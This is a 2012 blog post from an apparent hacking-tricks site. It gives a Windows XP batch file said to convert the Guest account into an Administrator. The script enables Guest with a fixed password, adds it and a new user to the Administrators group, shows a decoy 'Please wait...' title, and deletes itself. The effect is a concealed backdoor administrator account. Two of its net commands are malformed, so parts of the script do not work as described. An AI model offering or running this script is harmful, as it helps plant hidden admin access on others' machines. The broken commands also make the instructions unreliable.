Hello friends, I have written a mini book on Cyber Security awareness for you, named "Hacking into Hackers' Head". This book uses common terms to explain things, and I'm sure you will get benefitted from it in your day to day life. It's available on Kindle and Google Play. Grab your copy now.

Thursday, June 21, 2012

Convert your guest account to Admin in XP



Hello friends, I hope that you are enjoying the tricks posted on this site. Today I will tell you how to convert existing GUEST user into ADMIN in Windows XP.  For this, you don’t need any extra software. You can do it with the help of batch file.

Here are the simple steps. Just follow them:
1.       Open Notepad and copy paste the following commands.  Alternatively, you can write it in notepad.

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

2.       Save it as “something.bat” say admin.bat.
3.       You are done. Double click on this batch file. WOW! Your guest account is converted to Administrator.

NOTE: This trick works only in Windows XP. If it doesn’t , then please notify me as comment.
Enjoy hacking.

1 comment:

  1. Awesome Site! Great Job Done Here !

    My Site http://sonuxrt.blogspot.in/

    ReplyDelete

We appreciate your valuable comments.

Scroll to Top